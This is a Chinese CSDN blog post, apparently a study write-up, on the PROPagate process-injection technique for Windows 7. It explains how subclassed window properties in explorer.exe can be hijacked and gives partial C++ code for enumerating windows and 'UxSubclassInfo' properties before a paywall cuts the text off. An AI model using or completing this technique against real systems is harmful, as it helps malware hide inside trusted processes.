Win 7系统——进程注入技术之PROPagate(32位和64位均可注入)

最新推荐文章于 2024-04-25 18:24:17 发布
最新推荐文章于 2024-04-25 18:24:17 发布
阅读量1.1k 收藏 4
点赞数
分类专栏: Window原理编程学习之路 文章标签: propagate注入方法 Win 7 x86/x64
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/userpass_word/article/details/85374632
版权

        本文是根据原创作者文章仔细学习之后编写的,有助于部分想要该项注入技术的人更加深入理解。在文章末尾我会放上原创作者博客链接,我也参考了先知社区的那篇译文,那篇译文翻译的确实不错,我也会放在文章末尾的参考链接中。

        这种技术最早在2017年10月出现,Hexacorn公司的安全研究人员Adam发表了一篇文章,详细介绍了一种名为PROPagate的新型进程注入技术。

PROPagate技术介绍:

通常是插入新的子类头部,或修改现有的、其中包含可以从另一个进程控制的回调函数的子类头部。我们可以使用SetProp API来更新子类窗口,这与使用SetWindowLong/SetWindowLongPtr API来更新Windows回调过程是非常相似的。在这篇文章中,我们不仅会介绍PROPagate注入技术的工作原理,同时,还会说明这种注入方法相较其他方法的优越之处。截至2018年8月,该注入技术已经被应用到了Smoke Loader和RIG Exploit Kit中。

一、枚举指定窗口(搜索指定子窗口)

Windows资源管理器广泛使用子类化窗口,并且通常以中等完整性级别运行它们,使得登录用户无需启用任何权限即可访问相应窗口的进程空间。鉴于此,Windows资源管理器更有可能成为该方法的注入目标。不过,攻击者仍然需要寻找相应的子类头部,因此,在注入到Windows资源管理器之前,首先需要寻找现有的窗口对象及其属性。

按照以下步骤在explorer.exe中查找有效的子类头部:

1、调用EnumWindows函数
2、从EnumWindowsProc函数中调用EnumChildWindows函数
3、从EnumChildWindowsProc函数中调用EnumProps函数
4、从EnumPropsProc函数中使用参数"UxSubclassInfo"调用GetProp函数,以获得窗口句柄
5、如果GetProp函数返回有效句柄,则将其视为一个潜在的注入向量

源代码如下

#define UNICODE
 
#include <windows.h>
 
#include <tlhelp32.h>
 
#include <psapi.h>
 
#pragma comment(lib, "user32.lib")
 
#include <iostream>
 
#include <vector>
 
#include <algorithm>
 
 
 
 
typedef struct _win_props_t {
 
  DWORD  dwPid;
 
  WCHAR  ImageName[MAX_PATH];
 
  HANDLE hProperty;
 
  HWND   hParentWnd;
 
  HWND   hChildWnd;
 
  WCHAR  ParentClassName[MAX_PATH];
 
  WCHAR  ChildClassName[MAX_PATH];
 
} WINPROPS, *PWINPROPS;
 
   
 
std::vector<WINPROPS> windows;
 
int maxName=16, maxClass=16;
 
bool bAll=false;
 
 
 
 
// we want to ignore duplicates
 
BOOL IsEntry(PWINPROPS e) {
 
    BOOL bFound = FALSE;
 
     
 
    for(int i=0;i<windows.size(); i++) {
 
      // same process id?
 
      if(e->dwPid == windows.at(i).dwPid) {
 
        // same property?
 
        if(e->hProperty == windows.at(i).hProperty) {
 
          bFound = TRUE;
 
          break;
 
        }
 
      }
 
    }
 
    return bFound;
 
}
 
 
 
 
BOOL GetProcessImageName(DWORD dwPid, LPWSTR ImageName, DWORD dwSize) {
 
    HANDLE         hSnap;
 
    PROCESSENTRY32 pe32;
 
    BOOL           bFound=FALSE;
 
     
 
    // create snapshot of system
 
    hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 
    if(hSnap == INVALID_HANDLE_VALUE) return 0;
 
     
 
    pe32.dwSize = sizeof(PROCESSENTRY32);
 
 
 
 
    // get first process
 
    if(Process32First(hSnap, &pe32)){
 
      do {
 
        if(dwPid == pe32.th32ProcessID) {
 
          lstrcpyn(ImageName, pe32.szExeFile, dwSize);
 
          bFound = TRUE;
 
          break;
 
        }
 
      } while(Process32Next(hSnap, &pe32));
 
    }
 
    CloseHandle(hSnap);
 
    return bFound;
 
}
 
 
 
 
// callback for property list
 
BOOL CALLBACK PropEnumProc(HWND hwnd,
 
  LPCTSTR lpszString, HANDLE hData)
 
{
 
    WINPROPS wp;
 
    HANDLE   hp;
 
     
 
    hp = GetProp(hwnd, L"UxSubclassInfo");
 
    if(hp==NULL) hp = GetProp(hwnd, L"CC3
最低0.47元/天 解锁文章
ATree、063
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
QAC工具介绍和使用说明(供一种可量化措施的代码度量值属性:33基于功能 32基于文件和4个项目级别)
09-14
1、提供一种可量化措施的代码度量值属性:33基于功能 32基于文件和4个项目级别 2、功能结构关系图,以提供控制流动洞察 3、展示全局调用函数的关系图引用和文件树结构 4、提供统计分析对代码质量的全面评估 5、跨...
propagate:一系列关于 Javascript 事件的演示
06-21
传播:一系列关于 Javascript 事件的演示 一项正在进行的工作。 很早。 甚至不工作。 在这里看到它: :
一种x64进程使用x86 DLL的方法
linlin003的专栏
06-25 1万+
一种x64进程使用32位 DLL的方法有的时候要用第三方的DLL,但是仅有32位版本,自己开发的程序又必须是是64位的,这下头就疼了。。。。其实反之也是一样的头疼,这时候有什么办法呢?一个典型的思路就是用32位进程加载DLL,然后64位进程32位进程通讯。其实微软已经有了COM技术来帮我们解决这个问题:1.创建一个进程外COM服务器。2.使用COM服务器的相关接口去包装32位DLL的接口。3.6...
windows下的进程注入
12-21 109
。 转载于:https://www.cnblogs.com/beyond-Acm/p/4176687.html
PyG的MessagePassing基类中self.propagate函数的消息传递机制
最新发布
m0_52438642的博客
04-25 747
前面提到,message函数对应着邻居信息的变换,这里假设对邻居信息的变换具体指对邻居的信号乘以2,则直接返回2*x_j即可,即。,其分别对应着1 2 0 0 0 1 2号结点(edge_index中的第2行),即所有尾结点的图信号。,其分别对应着0 0 1 2 0 1 2号结点(edge_index中的第1行),即所有头结点的图信号。,对其余所有结点进行相同的操作,就完成了aggregate函数的任务:邻居信息的聚合。,找到1号结点所有的邻居结点,即x_j的第3行和第6行,然后加和,结果为。
32位dll转64位工具_32位64位操作系统之间的区别
weixin_39787089的博客
11-20 1039
在计算中,存在两种类型的处理器,即32位64位。 这些处理器告诉我们处理器可以从CPU寄存器访问多少内存。一个32位系统可以访问232( 232 )个内存地址,即4GB的RAM或物理内存。一个64位系统可以访问264( 264 )个内存地址,也就是说,实际上是180亿(18-Quintillion)GB的RAM。简而言之,任何大于4GB的内存都可以很容易地被它处理。在1990年代和2000年代初...
64位操作系统上运行32位的程序
热门推荐
AMinfo的专栏
11-30 3万+
运行 32 位程序 WOW64 子系统使 32 位程序能够在基于 x64 版本的 Windows Server 2003 和 Windows XP 专业 x64 版的运行而不用修改。WOW64 子系统是通过在基于 x64 版本的 Windows Server 2003 和 Windows XP 专业 x64 版的创建 32 位环境。WOW64 子系统有关的详细信息,请参阅 Microsoft
win764位32位有什么区别_32位64位它们是什么关系?它们又有什么区别?
weixin_39889544的博客
11-18 195
现在熟悉系统的同学们,都知道现在Windows系统都有32位64位的区分。其实,x64其实就是64位x86其实就是32位,在口语中我们说32位会多于x86。1、硬件在硬件上,32 位 软件和 64 位 最大区别,也是当年 64 位被推上舞台的原因,32 位支持的内存是 2^32 Byte,也就是最大只支持 4 GB 内存。而64位支持 2^64 Byte,也就是 17179869184G = ...
vc判断指定进程或程序名是否存在和进程为64或者32位
dxy408460910的专栏
02-24 1525
一、判断指定程序名的进程是否存在 BOOL EnumWindows( WNDENUMPROC lpEnumFunc, // pointer to callback function LPARAM lParam // application-defined value);        The EnumWindows function enumerates all top-lev
propagate:带有24个级别的React-Native瓷砖翻转益智游戏。 在App Store中查看! -技术
05-02
在Android和应用商店中下载Propagate! 怎么玩 1.选择“新游戏” 2.调查您的董事会3.在三种不同的翻转模式之间进行选择4.将所有瓷砖翻转为红色5.升级! 6.看看你能走多远。 你能战胜所有关卡吗?
propagate_const:用于C ++标准库的const传播成员指针包装器
05-28
这提供了必要的包含路径和C ++功能,这些内容和propagate_const包含到项目中所需的C ++功能。 外部的 要包含propagate_const您将需要使用find包来从生成的包配置中找到提供的名称空间导入目标。 可以从安装位置或...
线性自回归matlab代码-GuamOxygenIsotopes:关岛JinapsanCave的ISOLUTION和洞穴监测
05-27
Cave的ISOLUTION和洞穴监测 ############################################################################################################# oxygen_isotope_stats_functions.py: oxygen_isotope_stats_...
32位进程注入64位进程
02-20 808
远程线程注入的做法是通过API:CreateRemoteThread在目标进程创建远程线程,让这个线程实现LoadLibrary去加载动态库。LoadLibrary函数通过kernel32导出,在32位64位下的地址是不同的,所以一般来说32位是无法注入64位的。在github上有一个开源项目rewolf-wow64ext,该项目的目的是让运行在Wow64下的32位程序可以调用x64下...
windows下守护sqlserver进程并将bat注入服务
u012193456的博客
11-22 449
最近windows服务上的SqlServer2008进程老是莫名其妙的自动崩了,原因一时半会查不出来,所以准备监控一下SqlServer进程,崩了自动重启
关于win7 64位下的DLL注入问题 个例
embededvc的专栏
06-07 4119
一个自己写的程序,在程序里openprocess了一个notepad.exe,然后用常规的WriteProcessMemory方法注入,总是提示加载模块失败 后来查到64位程序调用64位的DLL 32调用32的DLL typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL); BOOL IsWow64(HANDLE h) {
_SYSTEM_PROCESS 32位64位的结构
whatday的专栏
09-10 3300
typedef ULONG KPRIORITY; typedef enum _SYSTEM_INFORMATION_CLASS    {     SystemBasicInformation,                 //  0 Y N     SystemProcessorInformation,             //  1 Y N     SystemPerfor
获得进程的EPROCESS
Kendiv's Box
01-31 5507
获得进程的EPROCESS发布日期:2004-06-02文摘内容: 文摘出处:http://www.xfocus.net/articles/200406/706.html创建时间:2004-06-01文章属性:原创文章提交:MustBE (zf35_at_citiz.net)By [I.T.S]SystEm32Welcome to our web site http://itaq.ynpc
SYSTEM_HANDLE_TABLE_ENTRY_INFO
weixin_30500473的博客
06-11 540
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex; UCHAR HandleAttributes; USHORT HandleValue; PVOID Object...
(转) SYSTEM_HANDLE_INFORMATION中ObjectTypeIndex的定义
小驹的专栏
11-03 4849
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO{ USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex; UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG Gran
propagate 函数代码
05-24
以下是一个简单的 propagate 函数的代码示例,用于在神经网络中传播信号(向前和向后): ``` def forward_propagate(X, W1, b1, W2, b2): # 计算隐藏层的输入 z1 = np.dot(W1, X) + b1 # 计算隐藏层的输出 a1 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值